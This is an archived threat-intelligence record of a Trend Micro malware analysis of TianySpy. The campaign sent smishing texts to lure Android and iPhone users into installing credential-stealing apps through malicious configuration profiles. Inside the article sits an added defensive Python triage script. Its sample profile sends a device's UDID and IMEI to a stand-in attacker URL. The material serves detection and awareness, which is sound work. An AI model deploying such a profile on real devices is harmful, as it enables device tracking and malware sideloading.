{
	"id": "639886e4-0b91-4dda-83a2-bde8bb84894d",
	"created_at": "2026-04-06T00:18:47.59516Z",
	"updated_at": "2026-04-10T13:12:52.704444Z",
	"deleted_at": null,
	"sha1_hash": "abd1873b40a2a6cc0d14fb2e5991959da318c7c7",
	"title": "TianySpy Malware Uses Smishing Disguised as Message From Telco",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 966863,
	"plain_text": "TianySpy Malware Uses Smishing Disguised as Message From Telco\r\nBy: Trend Micro Jan 25, 2022 Read time: 4 min (1200 words)\r\nPublished: 2022-01-25 · Archived: 2026-04-02 10:43:35 UTC\r\nMobile\r\nTrend Micro confirmed a new mobile malware infection chain targeting both Android and iPhone devices. The malware appears to have been designed to steal credentials for the membership websites of major Japanese telecommunications services.\r\nThis blog was first published here: https://blog.trendmicro.co.jp/archives/29322\r\nSMS (text messaging) has long been used as a means of spreading mobile malware. In September 2021, Trend Micro confirmed a new mobile malware infection chain targeting both Android and iPhone devices. The chain is triggered by a smishing message that appears to come from a telecommunications company. The malware appears to have been designed to steal credentials for the membership websites of major Japanese telecommunications services.\r\nThis is the first case confirmed by Trend Micro in which an iPhone was the target of a malware infection triggered by smishing; in all previous cases, Android devices were the main target. The threat is noteworthy enough that the Japan Cybercrime Control Center (JC3) has also published a similar alert.\r\nFigure 1. Examples of smishing messages confirmed to be part of a TianySpy campaign\r\nInfection chain\r\nThis campaign was confirmed as active between September 30 and October 12, 2021. The smishing message, disguised as coming from a telecommunications company, contains a link to a malicious website. 
In turn, the website instructs the user to install what appears to be security software but is actually malware.\r\nTrend Micro confirmed two patterns of message spread in this campaign.\r\nIn the first pattern, the SMS is sent from a malicious SMS delivery service:\r\n【●●●】お客様がご利用の●アカウントが不正利用の可能性があります。ご確認が必要です。\r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 1 of 8\r\n(In English: “[●●●] The ● account you are using may have been accessed without authorization. Please confirm.”)\r\nIn the second pattern, the SMS is likely sent from devices infected with “AndroidOS_KeepSpy.GCL,” an Android malware:\r\n●●●お客様センターです。ご利用料金のお支払い確認が取れておりません。ご確認が必要です。\r\n(In English: “This is the ●●● customer center. We have not been able to confirm payment of your usage charges. Please confirm.”)\r\nIn the first pattern, TianySpy infections were confirmed where users accessed the malicious link from either an Android device or an iPhone. In the second pattern, Android users who were lured into accessing the malicious link were infected with KeepSpy, while iPhone users who accessed the same link were infected with the iPhone version of TianySpy.\r\nFigure 2. Malicious site accessed from an Android device\r\nFigure 3. Malicious site accessed from an iPhone device\r\nAn iPhone configuration profile is a mechanism for defining settings for various device functions, including Wi-Fi. In this campaign, users were lured into downloading and installing a malicious configuration profile after following the link in a smishing SMS sent to their iPhone. 
Trend Micro research confirmed that device information, including the Unique Device Identifier (UDID), is sent to the attacker’s site when the malicious configuration profile is installed.\r\nThe exfiltrated UDID is then added to the ad hoc provisioning profile embedded in the TianySpy app. This allows TianySpy to be installed on that specific iPhone through Ad Hoc distribution, a mechanism normally used to deploy an application to a fixed set of registered test devices during development.\r\nFigure 4. Example of a malicious configuration profile\r\nFigure 5. Example of data transmitted upon installation of the configuration profile\r\nFigure 6. Example of the malicious application (.ipa) and provisioning profile\r\nFigure 7. Contents of the embedded mobile provision (the UDID stolen from the iPhone is listed as an installable device)\r\nMalware analysis\r\nFrom our analysis of the Android version of TianySpy, we determined that the malware has the following functions:\r\nReading Wi-Fi settings\r\nTampering with a legitimate telecommunications company’s site, specifically its usage-statement page, via WebView (Android’s in-app web display component)\r\nStealing information through malicious JavaScript\r\nSending stolen data by email\r\nDisplaying a malicious or fake site\r\nTianySpy first checks the Wi-Fi settings and, if Wi-Fi is enabled, displays an alert message urging the user to turn it off. Once Wi-Fi is disabled, an authentication page is shown (authentication is required before the usage-statement page is displayed), and the entered credentials and authenticated cookies are sent to the attacker’s email address. Wi-Fi is likely disabled at this stage because the attacker wants to collect credentials over the carrier network. 
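\r\nThe profile chain described above can be checked offline: a Profile Service configuration profile makes the device report its UDID to a URL, and an ad hoc provisioning profile is only valid for devices whose UDIDs it lists. The Python script below is an added example, not code from the original post or from Trend Micro. It assumes the malicious configuration profile used the standard Profile Service payload (the documented way a profile gets iOS to POST device attributes such as the UDID to a server); the .mobileconfig, the bytes standing in for the CMS wrapper, the UDID values, the team and bundle identifiers and the URL attacker.invalid are all constructed for the example.

```python
import plistlib


def parse_xml_plist(data):
    '''Parse an XML property list (.mobileconfig, or the plist inside a .mobileprovision).'''
    return plistlib.loads(data, fmt=plistlib.FMT_XML)


def _walk_dicts(node):
    '''Yield every dict in a nested plist structure.'''
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk_dicts(value)
    elif isinstance(node, list):
        for value in node:
            yield from _walk_dicts(value)


def udid_harvesting_payloads(mobileconfig):
    '''Return (URL, requested attributes) for each Profile Service payload that asks
    for the UDID. iOS POSTs the listed DeviceAttributes to URL when the profile is
    installed, so such a profile from an untrusted sender is a UDID leak.'''
    hits = []
    for payload in _walk_dicts(parse_xml_plist(mobileconfig)):
        if payload.get('PayloadType') != 'Profile Service':
            continue
        content = payload.get('PayloadContent', {})
        attributes = list(content.get('DeviceAttributes', []))
        if 'UDID' in attributes:
            hits.append((content.get('URL', ''), attributes))
    return hits


def extract_provision_plist(mobileprovision):
    '''A .mobileprovision is a CMS (PKCS#7) SignedData blob wrapping an XML plist.
    Carving the plist out by its XML markers is enough for triage.'''
    start = mobileprovision.find(b'<?xml')
    end = mobileprovision.find(b'</plist>')
    if start < 0 or end < 0:
        raise ValueError('no embedded plist found')
    return parse_xml_plist(mobileprovision[start:end + len(b'</plist>')])


def classify_provision(prov):
    '''Infer the distribution method from the profile keys.'''
    if prov.get('ProvisionsAllDevices'):
        return 'enterprise'
    if 'ProvisionedDevices' in prov:
        if prov.get('Entitlements', {}).get('get-task-allow'):
            return 'development'
        return 'ad-hoc'
    return 'app-store'


def device_is_targeted(mobileprovision, udid):
    '''True when the app was built to be sideloaded onto this specific device.'''
    prov = extract_provision_plist(mobileprovision)
    return classify_provision(prov) == 'ad-hoc' and udid in prov.get('ProvisionedDevices', [])


# Constructed sample: a Profile Service profile that reports the UDID to a
# hypothetical collection URL (attacker.invalid is a reserved, non-routable name).
SAMPLE_MOBILECONFIG = b'''<?xml version='1.0' encoding='UTF-8'?>
<plist version='1.0'><dict>
  <key>PayloadType</key><string>Profile Service</string>
  <key>PayloadVersion</key><integer>1</integer>
  <key>PayloadIdentifier</key><string>com.example.fake-security</string>
  <key>PayloadUUID</key><string>11111111-2222-3333-4444-555555555555</string>
  <key>PayloadDisplayName</key><string>Security Software</string>
  <key>PayloadContent</key><dict>
    <key>URL</key><string>https://attacker.invalid/enroll</string>
    <key>Challenge</key><string>constructed</string>
    <key>DeviceAttributes</key><array>
      <string>UDID</string><string>IMEI</string>
      <string>VERSION</string><string>PRODUCT</string>
    </array>
  </dict>
</dict></plist>'''

# Constructed sample UDID, standing in for the value the profile reported.
STOLEN_UDID = '11111111222222223333333344444444aaaaaaaa'

# Constructed sample embedded.mobileprovision: stand-in bytes for the CMS wrapper
# around an ad hoc profile that lists the stolen UDID as an installable device.
SAMPLE_MOBILEPROVISION = (
    bytes([0x30, 0x82, 0x0a, 0xbc]) + b'CMS-SIGNEDDATA-STAND-IN'
    + b'''<?xml version='1.0' encoding='UTF-8'?>
<plist version='1.0'><dict>
  <key>AppIDName</key><string>Security Software</string>
  <key>Name</key><string>Ad Hoc Distribution Profile</string>
  <key>TeamIdentifier</key><array><string>ABCDE12345</string></array>
  <key>Entitlements</key><dict>
    <key>application-identifier</key><string>ABCDE12345.com.example.fake-security</string>
    <key>get-task-allow</key><false/>
  </dict>
  <key>ProvisionedDevices</key><array>
    <string>11111111222222223333333344444444aaaaaaaa</string>
    <string>99999999999999999999999999999999bbbbbbbb</string>
  </array>
</dict></plist>'''
    + b'CMS-SIGNATURE-STAND-IN')


def triage(mobileconfig, mobileprovision, udid):
    '''Tie both halves of the chain together for one device.'''
    return {
        'udid_collectors': udid_harvesting_payloads(mobileconfig),
        'distribution': classify_provision(extract_provision_plist(mobileprovision)),
        'device_targeted': device_is_targeted(mobileprovision, udid),
    }


if __name__ == '__main__':
    print(triage(SAMPLE_MOBILECONFIG, SAMPLE_MOBILEPROVISION, STOLEN_UDID))
```

On a real sample, pull embedded.mobileprovision out of the .ipa (it sits next to the app binary inside Payload/) and, on macOS, decode it with security cms -D -i embedded.mobileprovision instead of carving; a full check also verifies that the CMS signature chains to Apple, since the plist is otherwise untrusted input. A user-installed profile that requests DeviceAttributes from a sender other than your MDM, followed by an ad hoc profile whose ProvisionedDevices contains your own UDID, is exactly the pattern this campaign used.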
\r\nFigure 8. Decompiled code from the Android version of TianySpy (left) and the alert message shown when Wi-Fi is enabled (right)\r\nFigure 9. Decompiled code from the Android version of TianySpy (encrypted attacker’s email address)\r\nFigure 10. Decrypted attacker’s email address\r\nstop.html, bundled in TianySpy’s resources, is displayed when the user reaches the legitimate usage-statement page. Its content makes the site appear to be under maintenance or undergoing security enhancement. We believe the attacker’s purpose is to hide the usage-statement page from the victim.\r\nFigure 11. stop.html in the resources of the Android version of TianySpy\r\nFigure 12. Contents of stop.html\r\nThe iPhone version of TianySpy shows many similarities with the Android version, such as holding encrypted strings containing the URL of the usage-statement page, the attacker’s email address, and stop.html. The iPhone version is therefore highly likely to steal credentials and send them to the attacker in the same way.\r\nFigure 13. String values included in the iPhone version of TianySpy\r\nFigure 14. String values included in the iPhone version of TianySpy (encrypted email address)\r\nFigure 15. Decrypted email address; the same address is seen in the Android version of TianySpy\r\nRelation with a phishing group targeting local banks in Japan\r\nThe Cyber Security Institute at Trend Micro collaborated with JC3 and its members to research and analyze a phishing group targeting domestic banks in Japan. 
The results of this collaboration were reported in April 2021. Trend Micro also reported notable characteristics of BP1 and BP6, the two largest banking phishing groups identified in the project.\r\nAs mentioned earlier, some text messages seen in this campaign contained links that lured users into installing what appeared to be security software; in reality, users ended up unknowingly infecting their device with the Android malware KeepSpy. It has also been confirmed that when these phishing sites are accessed from an iPhone outside the observed campaign period (September 30 to October 12, 2021), they appear as the website of a telecommunications company and are categorized under the BP1 group.\r\nFigure 16. HTML source of a phishing site disguised as the website of a telecommunications company\r\nFigure 17. HTML source of a phishing site disguised as the website of a telecommunications company\r\nHow to protect yourself from phishing\r\nThis is the first case in Japan in which malware targeting iPhones resulted in financial damage.\r\nThis campaign shows that an iPhone can indeed be infected with malware once a malicious configuration profile is installed. The case also confirmed that simply accessing a malicious website does not by itself infect a device: the user has to complete the installation steps for the infection to take place. With enough knowledge and caution, a user can therefore protect their device from infection.\r\nWe also believe that smishing will continue to be part of this loop of attack chains targeting smartphones. 
In the meantime, JC3 continues to publish alert notifications regarding the campaign detailed in this blog.\r\nMore details on smishing and how to protect yourself from such threats can be found in this blog.\r\nIndicators of compromise\r\nSHA256 | Trend Micro Detection\r\nb42bdfceb8e7733db22645fee95482dccf5260dcd3ff15ede0de77d2120c3845 | AndroidOS_TianySpy.GCL\r\na16878598e0ce5924fa45c09319b48e566f4d935626042ba378f4f1f7b9ad798\r\n5d27cc2e0a8ab987341e8995bf50cc763160cce4191df9a94c4b39b570c0d6a5\r\n73c19a778500c6fb04f60d60527ea76a870590ed9e0f6014cb03419d02ff0457\r\nada8dfe4914f824e5a4a03aec8f135a4544cc0086830f23285dc67d42ec1f29c\r\n839246c1b13d2d9c87907bdd4069ce0aad02e5660cb10fad4a85805e4b81dcea\r\nSource: https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html"
	],
	"report_names": [
		"tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434727,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/abd1873b40a2a6cc0d14fb2e5991959da318c7c7.pdf",
		"text": "https://archive.orkl.eu/abd1873b40a2a6cc0d14fb2e5991959da318c7c7.txt",
		"img": "https://archive.orkl.eu/abd1873b40a2a6cc0d14fb2e5991959da318c7c7.jpg"
	}
}